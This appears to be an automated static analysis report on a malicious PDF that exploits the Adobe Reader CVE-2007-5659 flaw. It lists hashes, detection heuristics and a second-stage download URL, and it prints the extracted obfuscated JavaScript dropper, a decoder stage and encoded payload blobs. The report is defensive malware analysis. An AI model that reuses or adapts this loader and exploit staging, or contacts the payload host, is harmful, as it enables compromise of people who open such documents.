Malicious PDF — malware analysis report

Static analysis result for SHA-256 643c4cba69c916a8…

MALICIOUS

PDF

15.3 KB
MD5: 9acb03ee60499ecffd7bd87a7ac3e731 SHA-1: f6f87ad34c20ea6f14d0cad81ef31e0f47bda1bf SHA-256: 643c4cba69c916a865115555ae68ef7777215c609e8c2e8a8fd27b78a5be8e4b
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The script is designed to download a second-stage payload from the embedded URL http://searchfunes.org/cgi-bin/153/n002106201r0019R07367a84X30cc559eY4826da27Z0100f060. The deobfuscation process reveals a multi-stage dropper mechanism.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://searchfunes.org/cgi-bin/153/n002106201r0019R07367a84X30cc559eY4826da27Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 5 at offset 0x148 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
78ac4053b6908ea54e769f221f45637d35df73ecc7da3960a8c5363b50f08a41		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x19D3 12009 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function oN3_QV3i(g8xu_R2, i0huG1BO){var dJ__2Y1OlVb_1_N = 20;var Lm_hru744PPk = 0;var E_AF8U_X_4a = 512;var km__wY_0I1 = dJ__2Y1OlVb_1_N;var Bq22AA = "";var w_EEwN0_BBbxXd = 4;var hh0YTHLt7A4 = this;var bK2DR7QGhk8_8_V = "1234ee";var r__qReVg = arguments;try {var gLAh_u7b = 0;if (app) {km__wY_0I1 = km__wY_0I1 + 2;i0huG1BO = pr[gLAh_u7b].subject;}bK2DR7QGhk8_8_V = bK2DR7QGhk8_8_V.replace(/\d+/, "call");} catch(e) { }km__wY_0I1 = km__wY_0I1 - dJ__2Y1OlVb_1_N;var o7F_0_O4 = new Array();var p_4K_R_GBd__bq = 150;if (p_4K_R_GBd__bq > 0) {o7F_0_O4[0] = p_4K_R_GBd__bq;o7F_0_O4[1] = E_AF8U_X_4a;o7F_0_O4[0] = o7F_0_O4[0] - p_4K_R_GBd__bq;o7F_0_O4[2] = o7F_0_O4[0];o7F_0_O4[1] = o7F_0_O4[1] - E_AF8U_X_4a;o7F_0_O4[3] = o7F_0_O4[1];}if (g8xu_R2) { o7F_0_O4 = g8xu_R2;}if (!g8xu_R2) {var e_ksX4_e2y_E = r__qReVg[bK2DR7QGhk8_8_V].toString();var g6__vO = 0;var c__vO_l = g6__vO;p_4K_R_GBd__bq = p_4K_R_GBd__bq - 102;var Pfd6_D_u__51v = 0;while(c__vO_l < e_ksX4_e2y_E.length) {Pfd6_D_u__51v = e_ksX4_e2y_E.charCodeAt(c__vO_l);if (Pfd6_D_u__51v >= p_4K_R_GBd__bq && Pfd6_D_u__51v <= 57) {if (g6__vO == w_EEwN0_BBbxXd) {g6__vO = -1;}if (g6__vO < 0) { g6__vO = 0; }o7F_0_O4[g6__vO] += Pfd6_D_u__51v;if (o7F_0_O4[g6__vO] > E_AF8U_X_4a) {o7F_0_O4[g6__vO] -= E_AF8U_X_4a;}g6__vO = g6__vO + 1;}c__vO_l = c__vO_l + 1;}}var JTCoBYI8 = 0;var g2iMdWa = 0;var H4G_F_j = -1;var XRJqe7j = 0;var n0B8Br7 = 0;do {var G7_p8g8T_3rW4 = 256;if (o7F_0_O4[XRJqe7j] > G7_p8g8T_3rW4) {o7F_0_O4[XRJqe7j] -= G7_p8g8T_3rW4;}XRJqe7j = XRJqe7j + 1;} while (XRJqe7j < w_EEwN0_BBbxXd);XRJqe7j = XRJqe7j - w_EEwN0_BBbxXd;while(XRJqe7j < i0huG1BO.length) {var ksgEo__S3uHax = i0huG1BO.substr(XRJqe7j, 1) + ' V V ';XRJqe7j = XRJqe7j + 1;var D3HT0X0 = parseInt(ksgEo__S3uHax, dJ__2Y1OlVb_1_N);if (H4G_F_j != -1) {g2iMdWa += D3HT0X0;if (JTCoBYI8 == w_EEwN0_BBbxXd) {JTCoBYI8 = 0;}var A_x3_y_e1_jp = g2iMdWa;A_x3_y_e1_jp = A_x3_y_e1_jp - (n0B8Br7 + 2) * o7F_0_O4[JTCoBYI8];if (A_x3_y_e1_jp <= 0) {A_x3_y_e1_jp = A_x3_y_e1_jp - Math.floor(A_x3_y_e1_jp / 256) * 256;}A_x3_y_e1_jp = String.fromCharCode(A_x3_y_e1_jp);if (km__wY_0I1 == 1) {Bq22AA += D3HT0X0;} else if (km__wY_0I1 == 2) {Bq22AA += A_x3_y_e1_jp;} else {Bq22AA += XRJqe7j;H4G_F_j = -2;}H4G_F_j = -1;JTCoBYI8 = JTCoBYI8 + 1;n0B8Br7 = n0B8Br7 + 1;} else if (H4G_F_j == -1) {H4G_F_j = dJ__2Y1OlVb_1_N;g2iMdWa = D3HT0X0 * dJ__2Y1OlVb_1_N;}}var e6F_7b__s0s = this;e6F_7b__s0s['ev'+'al'](Bq22AA);}
	oN3_QV3i(0, "2e8g263e8a98af131b9j556f918b25b626041f56691hai2b2hbj3h79923042020b4ecb8d8b2h931hc25i5fb14g54c02acb91bhcc4g7f6j38219i59038i9i1b6hb4a47ga44ib27i872616541f8f2ha8882f327i358b17717a27633h3g603b9c8614538445815h35bh2e943a166ba20895059d8h438g044dc10d9j012i6c0j94be23285a4890423f1i2a4g1e81542c8b2g1d753g7e8e763b1gc09c03886075aa02cd73327063bd3b50bc0dc5bg4gcf972e1b1a389a5dc3052ac01e84bi8b277j69c83725a26437cb752g5a95cc8578808j119a2hc88cag12952cbj7jca7806449d1bbb0g1757bi9d762j3h91584g4g64920e3acf685i6a88a7b47b85708j803d0g2c5jcf6h947e99c41h9c848b79be31c02b100e99901h741i23cb6b95600f0h0eb41c9h7763589a0ibc2g65bh72701a222d8b9cag6f6e9a3c2774259697c024460eae8f1c5i0i485bb4244gbi720ib794c63i7e328f3a7g9g215h3f025d41a17h2179640i918f3g9c076i3e288f7dccbb26ba9c5e4ga8398ic1a8b8794g28bgae0e125b805i4214bjb415b84c4g2e742f244362755f891a35cb531d9b8ca69h0221ad307691bj0c3407a20a8g8fah9853261i68c24gc4052ac20g84114g5c8c460e46271c5i76ag5bb44984be4i6e409b0ga53f2176831d8h0e9b7e3g4gag34af24b722295f2ha6b5b4025g3e8e3e5bacc0602348603dcaa53184976a898751a20g99176h7677c10h0e8f568c5ac745281j0j105664ab80cbb436388a8e2i332cc054cb94602ha20icd2f2e8a4i3fcb1e0g8dbfbd766b9d5d0e7j2i0c637f317c1d017g0j89027j7ic1bd46035e22137f1dcf89be852f7b9i21611808906ic3ae2a7ca241545g3i7fcb9c2i1654acc9b51jbf653082b02ic11j001h3c8c1cbi092c2f4c53650321ajb45eac838956af26c14172775e763j231d53b5624i6j6a02bf736dab7jbe381fc2c9b18c7j0i894jcbb36hbj8c3a252a213h849e89507j6h2434260c6h45137d157c821i85957b9220670d074g85a95e2j87a5377j027077c20h1h187j22c1abb4105g185c172a99b46418607j5eai9e2h6e76425i8d1cb3b45dbj3g4g727c1721ae7f865d99420bc2ce0j8381ab77c2b6133a6257cb28401b3ibi7e954i8622c66h3jbg857j395g264fb0c87j8i7e362h9i42aa5ibhcb7j1i04be0d9
... (truncated)
deobfuscated.js
a476aeec8cbc2ed074fff131ee9a8096822b31cca794c184b9ac2f9035504e7a		 deobfuscated-js PDF JavaScript deobfuscation pass 72989 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

2e8g263e8a98af131b9j556f918b25b626041f56691hai2b2hbj3h79923042020b4ecb8d8b2h931hc25i5fb14g54c02acb91bhcc4g7f6j38219i59038i9i1b6hb4a47ga44ib27i872616541f8f2ha8882f327i358b17717a27633h3g603b9c8614538445815h35bh2e943a166ba20895059d8h438g044dc10d9j012i6c0j94be23285a4890423f1i2a4g1e81542c8b2g1d753g7e8e763b1gc09c03886075aa02cd73327063bd3b50bc0dc5bg4gcf972e1b1a389a5dc3052ac01e84bi8b277j69c83725a26437cb752g5a95cc8578808j119a2hc88cag12952cbj7jca7806449d1bbb0g1757bi9d762j3h91584g4g64920e3acf685i6a88a7b47b85708j803d0g2c5jcf6h947e99c41h9c848b79be31c02b100e99901h741i23cb6b95600f0h0eb41c9h7763589a0ibc2g65bh72701a222d8b9cag6f6e9a3c2774259697c024460eae8f1c5i0i485bb4244gbi720ib794c63i7e328f3a7g9g215h3f025d41a17h2179640i918f3g9c076i3e288f7dccbb26ba9c5e4ga8398ic1a8b8794g28bgae0e125b805i4214bjb415b84c4g2e742f244362755f891a35cb531d9b8ca69h0221ad307691bj0c3407a20a8g8fah9853261i68c24gc4052ac20g84114g5c8c460e46271c5i76ag5bb44984be4i6e409b0ga53f2176831d8h0e9b7e3g4gag34af24b722295f2ha6b5b4025g3e8e3e5bacc0602348603dcaa53184976a898751a20g99176h7677c10h0e8f568c5ac745281j0j105664ab80cbb436388a8e2i332cc054cb94602ha20icd2f2e8a4i3fcb1e0g8dbfbd766b9d5d0e7j2i0c637f317c1d017g0j89027j7ic1bd46035e22137f1dcf89be852f7b9i21611808906ic3ae2a7ca241545g3i7fcb9c2i1654acc9b51jbf653082b02ic11j001h3c8c1cbi092c2f4c53650321ajb45eac838956af26c14172775e763j231d53b5624i6j6a02bf736dab7jbe381fc2c9b18c7j0i894jcbb36hbj8c3a252a213h849e89507j6h2434260c6h45137d157c821i85957b9220670d074g85a95e2j87a5377j027077c20h1h187j22c1abb4105g185c172a99b46418607j5eai9e2h6e76425i8d1cb3b45dbj3g4g727c1721ae7f865d99420bc2ce0j8381ab77c2b6133a6257cb28401b3ibi7e954i8622c66h3jbg857j395g264fb0c87j8i7e362h9i42aa5ibhcb7j1i04be0d900c8780b41931c17j2i1i5i2e1j7h215j3f4c9fbc4d463g5h57c9ad2a7297358c6168b4bg5j2i495fa206ah06c869415cc664bcbd1e2i638iaj9hc1c7196c4a5d36270h1b20ac5j4g61ad2hb44g7i98818c0gc4b65cb3a881a568441g8h6j8c5fa51j2g1dcb90934g019e5gc50f51cd8i2a1j552419bg08635d8178b46243098458bj53027aajbf7j7g578b1i6710c28ba20792099a7d187j02419d0ha7150a7a2d0a870g289j587j3e53bic6532i2g8c5gcb0609798867946i52a2b65g294a5c6d81ajb47c5d4a599815b62j080i56541a9b291g0g4b736a2i3b0j1b3498794g2h6027cd2f56bg8i4g1c4b2b8hbfbd7b9b666226795ccf8eb62c6ibd8fc7bj73ai6e62c0bc43c17j22b57hc03070074g3d7e9gc547313h8i62cf9524519g485a9271ac2ba33a1e8b9ebjba0992693g7jca2hc10h9jbj2i5gbb80acbd0a8e726a422ib90a3aca7f84238db612757i6774704b381b86cb9i5i9fa60g2bb866b190c5354g1j9b9g864g12874h1g08379b6a2a27371b2g8dad99608b611b5f39b55h51137dc17a9hai65574h651ia64ebe549j0j6e1bba7g0e5d974d6ac0becc328bc7c7a9c80b6d16640b5ib5c34e364h6e7099ahc06i945c5a87510g1j9f1g514g93b7ba1bae585a5d9217bfb4161e8b8iab8c1gc01i7a6j90201202cd0f02a15f4ia63d06743d9d5c723848bi82c4bf8i7a935i1h88609e78bac4691b9j8gaj55a98c810j23521f8e2aag5fc608872b860j407a0i2f373g5d73bh7cbi7f9d4887936876cd78c423556j0b8204a964558i9g64b3c69j012i4ibf829ebfbj68645c3656b72c38be5h4g6g910hc7595g625d761b291b60cf9h7b969g23c7844ea187902f371993a97e6ccd684h2ac068af5i0e2b551b3fa5a95h317j6hc15a3had574e2d6e2357ab1560674h4icd6729155j9dc06ac1ba7f2h7ja4637619b13c3j8e220caib4125g224g1h288jcb381735724b949f1b4e83615d7a57c91b8j054h5h85af15c1ae6d7b4ga00gb8c0a7a66d6d027j1c08c745955j2i330j174ac3a1843g731j025i638b7j64c025b45cbd8a655f5636c06h33057bai1g57c79g9a0987ac7b6bb4b629ai5e061588b407780f73225i7ec02g370h7j62a9742478a241908b2g7jb48b33267ja2a092c18858274g9h298i2jbg0j4172038gab1b067f6h5d324j091b4bcd5d5h3ha721c16665874g5c08c4c05j9i7999aaa03f24ac389a8b932f41c8a39h7e64a37941c70d44965d2acf5d1b148i068555877a202g181h8i6fca8102569a096e8c784ibf7g0cbg51bca25ebf8789215jbd5476c10e0j3d7jc4c39i230b8j49601b3582bf1bcd534g3288af0f4e764i5c584fah1b8ebh6d78a68c0h1b8f54577h9i3825c4ce0b6a5gb86g
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.